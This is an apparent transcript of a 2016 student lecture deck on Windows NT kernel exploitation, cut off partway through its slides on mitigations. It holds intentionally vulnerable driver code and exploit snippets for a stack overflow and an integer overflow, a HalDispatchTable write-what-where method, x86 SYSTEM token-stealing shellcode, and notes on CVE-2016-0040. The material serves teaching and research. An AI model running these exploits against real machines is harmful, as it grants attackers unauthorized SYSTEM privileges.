exploitation techniques for nt kernel...exploitation techniques for nt kernel adrien ‘adr1’...

47
Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow Write What Where Shellcode CVEs CVE-2016-0040 Mitigations KASLR Integrity levels DEP/NX SMEP / SMAP CET Conclusion Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin EPITA July 14, 2016 Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 1 / 47

Upload: others

Post on 16-Apr-2020

22 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Exploitation techniques for NT kernel

Adrien ‘Adr1’ Garin

EPITA

July 14, 2016

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 1 / 47

Page 2: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Introduction

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 2 / 47

Page 3: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Introduction

Lot of security measure in userlandbypassing sandboxesring0 privilegesUAC bypassLots of signed drivers are vulnerable

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 3 / 47

Page 4: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Introduction

An error at the kernel level = BSoDThe kernel is a large and complex system

lots of interconnected subsystems that you have to deeplyunderstandless likely to be bug-free

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 4 / 47

Page 5: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

General concepts

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 5 / 47

Page 6: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

General concepts

find the location or o�sets of critical structures in kernelmemoryfind addresses of kernel API functionstwo possibilities for code execution

code located in user space (easier)code located in kernel space (harder but SMEP bypass)

Figure 1:Shellcode type overview

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 6 / 47

Page 7: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

General concepts

List modulesPRTL_PROCESS_MODULES m = VirtualAlloc(NULL, 1024 * 1024,

MEM_COMMIT,PAGE_READWRITE);

NtQuerySystemInformation(SystemModuleInformation,m, 1024 * 1024, NULL);

for (SIZE_T i = 0; i < m->NumberOfModules; ++i) {printf("Image base: %p\n", m->Modules[i].ImageBase);printf("Image name: %s\n",m->Modules[i].FullPathName + m->Modules[i].OffsetToFileName);

}

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 7 / 47

Page 8: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Output

Image base: FFFFF8008B683000Image name: ntoskrnl.exe

Image base: FFFFF8008B610000Image name: hal.dll

Image base: FFFFF8008A005000Image name: kd.dll

Image base: FFFFF8003D4C0000Image name: mcupdate_GenuineIntel.dll

Image base: FFFFF8003D550000Image name: werkernel.sys

Image base: FFFFF8003D560000Image name: CLFS.SYS[...]

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 8 / 47

Page 9: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

General concepts

Now we can load these module in user-space with LoadLibraryand use GetProcAddress to compute o�set

return GetProcAddress(ntoskrnl, "NtCreateFile) - ntoskrnl;

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 9 / 47

Page 10: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

General concepts

Figure 2:System process

Privilege escalationElevate privileges of the user-mode processCopy the System token and overwrite the current processaccess token

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 10 / 47

Page 11: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

General concepts

Enumerate EPROCESS structures in kernel memoryfind the System processcopy the pointer to the token structure of System to thecurrent process

Now the process receives the SID S-1-5-18

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 11 / 47

Page 12: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

DACL

Figure 3:DACL

Discretionary access control list (DACL)Specifies who has what access to the object

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 12 / 47

Page 13: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

ACL

WinDbglkd> !process 0 0 explorer.exePROCESS ffffe0005168a840

SessionId: 1 Cid: 1690 Peb: 00b85000 ParentCid: 1664DirBase: 191e8c000 ObjectTable: ffffc001f211eb80Image: explorer.exe

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 13 / 47

Page 14: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

ACL

WinDbglkd> !process 1690 1Searching for Process with Cid == 1690PROCESS ffffe0005168a840

SessionId: 1 Cid: 1690 Peb: 00b85000 ParentCid: 1664DirBase: 191f0c000 ObjectTable: ffffc001f211eb80Image: explorer.exeDeviceMap ffffc001dd5cd760Token ffffc001f212a960[...]

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 14 / 47

Page 15: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

ACL

WinDbglkd> !token ffffc001f212a960_TOKEN ffffc001f212a960TS Session ID: 0x1User: S-1-5-21-542871337-1692334756-291223173-1001User Groups:00 S-1-5-21-542871337-1692334756-291223173-513

Attributes - Mandatory Default Enabled01 S-1-1-0

Attributes - Mandatory Default Enabled[...]

Primary Group: S-1-5-21-542871337-1692334756-291223173-513Privs:19 0x000000013 SeShutdownPrivilege Attributes -23 0x000000017 SeChangeNotifyPrivilege Attributes - Enabled Default25 0x000000019 SeUndockPrivilege Attributes -33 0x000000021 SeIncreaseWorkingSetPrivilege Attributes -34 0x000000022 SeTimeZonePrivilege Attributes -

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 15 / 47

Page 16: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

ACL

WinDbglkd> !object ffffe0005168a840Object: ffffe0005168a840 Type: (ffffe0004ba88480) Process

ObjectHeader: ffffe0005168a810 (new version)HandleCount: 14 PointerCount: 421752

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 16 / 47

Page 17: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

ACL

WinDbglkd> dt _OBJECT_HEADER ffffe0005168a810nt!_OBJECT_HEADER

+0x000 PointerCount : 0n421628+0x008 HandleCount : 0n14[...]+0x020 ObjectCreateInfo : 0xffffe000�4fb86d80 _OBJECT_CREATE_INFORMATION+0x020 QuotaBlockCharged : 0xffffe000�4fb86d80 Void+0x028 SecurityDescriptor : 0xffffc001�d716b994 Void+0x030 Body : _QUAD

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 17 / 47

Page 18: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

ACL

WinDbglkd> !sd 0xffffc001�d716b994 & -10->Owner : S-1-5-21-542871337-1692334756-291223173-1001->Group : S-1-5-21-542871337-1692334756-291223173-513[...]->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE->Dacl : ->Ace[0]: ->AceFlags: 0x0->Dacl : ->Ace[0]: ->AceSize: 0x24->Dacl : ->Ace[0]: ->Mask : 0x001fffff->Dacl : ->Ace[0]: ->SID: S-1-5-21-542871337-1692334756-291223173-1001

->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE->Dacl : ->Ace[1]: ->AceFlags: 0x0->Dacl : ->Ace[1]: ->AceSize: 0x14->Dacl : ->Ace[1]: ->Mask : 0x001fffff->Dacl : ->Ace[1]: ->SID: S-1-5-18[...]

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 18 / 47

Page 19: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Internals

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 19 / 47

Page 20: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

How to pass bu�ers

Bu�ered I/ODirect I/ONeither Bu�ered Nor Direct I/o

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 20 / 47

Page 21: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Bu�ered I/O

Figure 4:Bu�ered I/OAdrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 21 / 47

Page 22: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Exploitation

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 22 / 47

Page 23: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

HackSys

Lot of resource exist for usermode exploitationBut not so much for kernelmode exploitationTry HackSys Extreme Vulnerable Driver

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 23 / 47

Page 24: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Stack overflow

driver.cNTSTATUS fooIoctlHandler(PIRP Irp, PIO_STACK_LOCATION IrpSp) {SIZE_T Size = 0;PVOID UserBuffer = NULL;

UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength

bar(UserBuffer, size);

return STATUS_SUCCESS;}

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 24 / 47

Page 25: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Stack overflow

void bar(IN PVOID UserBuffer, IN SIZE_T Size) {ULONG KernelBuffer[512] = {0};RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);

DbgPrint("[+] bar\n");}

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 25 / 47

Page 26: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Exploit

exploit.c// userModeBufferSize = 512 + 9

RtlFillMemory((PVOID)pUserModeBuffer, userModeBufferSize, 0x41);

pMemoryAddress = (PVOID)(((ULONG)pUserModeBuffer +userModeBufferSize) -sizeof(ULONG));

*(PULONG)pMemoryAddress = (ULONG)pEopPayload;

DeviceIoControl(hFile, FOO_IOCTL, pUserModeBuffer,userModeBufferSize,NULL, 0, &bytesReturned, NULL);

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 26 / 47

Page 27: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Integer overflow

driver.cvoid IntegerOverflow(PVOID UserBuffer, SIZE_T Size) {

ULONG BufferTerminator = 0xBAD0B0B0;SIZE_T TerminatorSize = sizeof(BufferTerminator);ULONG KernelBuffer[512] = {0};ULONG Count = 0;

if ((Size + TerminatorSize) > sizeof(KernelBuffer))return;

while (Count < (Size / sizeof(ULONG))) {if (*(PULONG)UserBuffer != BufferTerminator) {

KernelBuffer[Count] = *(PULONG)UserBuffer;UserBuffer = (PULONG)UserBuffer + 1;Count++;

} else {break;

}}

}Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 27 / 47

Page 28: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Exploit

exploit.cRtlFillMemory((PVOID)pUserModeBuffer, userModeBufferSize, 0x41);

pMemoryAddress = (PVOID)(((ULONG)pUserModeBuffer + userModeBufferSize) - (sizeof(ULONG) * 2));*(PULONG)pMemoryAddress = (ULONG)pEopPayload;

pMemoryAddress = (PVOID)((ULONG)pMemoryAddress + sizeof(ULONG));*(PULONG)pMemoryAddress = (ULONG)0xBAD0B0B0;

DeviceIoControl(hFile, IOCTL_INTEGER_OVERFLOW,(LPVOID)pUserModeBuffer,(DWORD)0xFFFFFFFF,NULL,0,&bytesReturned,NULL);

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 28 / 47

Page 29: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Write What Where

HalDispatchTable

KeQueryIntervalProfilekd> u nt!KeQueryIntervalProfilent!KeQUeryIntervalProfile+0x298099a101 lea eax,[ebp-0Ch]8099a104 push eax8099a105 push 0Ch8099a107 push 18099a109 call [nt!HalDispatchTable+0x4]8099a10f test eax,eax8099a111 jl 8099a11e

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 29 / 47

Page 30: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Exploit

Get the address of HalDispatchTableGet the base address of ntoskrnl.exeLoadLibrary(“ntoskrnl.exe”)GetProcAddress(ntoskrnl, “HalDispatchTable”)

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 30 / 47

Page 31: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Shellcode

System token stealingpushad ; Save registers statemov eax, fs:[0x124] ; KTHREADmov eax, [eax + EPROCESS_OFF]mov ecx, eax ; Copy current process _EPROCESS structuremov edx, 4 ; SYSTEM Pid

SearchSystemPID:mov eax, [eax + FLINK_OFF]sub eax, FLINK_OFFcmp [eax + PID_OFF], edxjne SearchSystemPID

mov edx, [eax + TOKEN_OFF] ; Get SYSTEM process nt!_EPROCESS.Tokenmov [ecx + TOKEN_OFF], edx ; Replace target process nt!_EPROCESS.Tokenpopad ; Restore registers state

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 31 / 47

Page 32: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

CVEs

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 32 / 47

Page 33: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

CVE-2016-0040

exploit-db #40039MS16-014 (February 9, 2016)KB3126587Uninitialized pointer dereferenceVulnerability can be triggered even by process with lowintegrity level

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 33 / 47

Page 34: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

CVE-2016-0040

WMIDataDevice accessible from user modeWmipReceiveNotifications is vulnerable

int WmipReceiveNotifications(int SystemBuffer,ULONG* OutputBufferSize,PVOID PRIP) {

if (SystemBuffer > 10) {LocalBuffer = ExAllocatePool(...);

}

if (SystemBuffer) {// init LocalBuffer

}

*(DWORD*)(LocalBuffer + 60) = UserBuffer[8];}

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 34 / 47

Page 35: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

CVE-2016-0040

We can use NtMapUserPage to spray the stackNtMapUserPhysicalPages(BufferUser, 1024,0x41414141);This will put 4096 ‘A’ into the stack

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 35 / 47

Page 36: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

CVE-2016-0040

WmipReceiveNotificationsFOLLOWUP_IP:nt!WmipReceiveNotifications+3158162ee36 89483c mov dword ptr [eax+3Ch],ecx

// ecx is 0x41414141 , eax is from stack

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 36 / 47

Page 37: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

Mitigations

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 37 / 47

Page 38: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

techniques for

NT kernel

Adrien ‘Adr1’

Garin

Introduction

General

concepts

Internals

Exploitation

Stack overflow

Integer overflow

Write What Where

Shellcode

CVEs

CVE-2016-0040

Mitigations

KASLR

Integrity levels

DEP/NX

SMEP / SMAP

CET

Conclusion

KASLR

Since Windows 7, kernel modules base addresses have beenrandomizedE�ective against remote exploitsBut with local exploit you can callNtQuerySystemInformation

Adrien ‘Adr1’ Garin (EPITA) Exploitation techniques for NT kernel July 14, 2016 38 / 47

Page 39: Exploitation techniques for NT kernel...Exploitation techniques for NT kernel Adrien ‘Adr1’ Garin Introduction General concepts Internals Exploitation Stack overflow Integer overflow

Exploitation

